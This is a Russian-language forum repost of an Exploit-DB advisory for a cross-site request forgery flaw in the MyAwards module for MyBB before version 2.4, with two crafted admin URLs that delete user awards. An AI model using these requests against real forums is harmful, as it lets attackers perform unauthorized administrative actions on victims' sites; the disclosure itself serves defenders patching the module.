Exploit MyAwards MyBB Module - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39290
Проверка EDB
  1. Пройдено
Автор
VAGINEER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2014-08-22
MyAwards MyBB Module - Cross-Site Request Forgery
Код:
source: https://www.securityfocus.com/bid/69386/info

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.

An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Versions prior to MyAwards 2.4 are vulnerable. 

https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
 
Источник
www.exploit-db.com

Похожие темы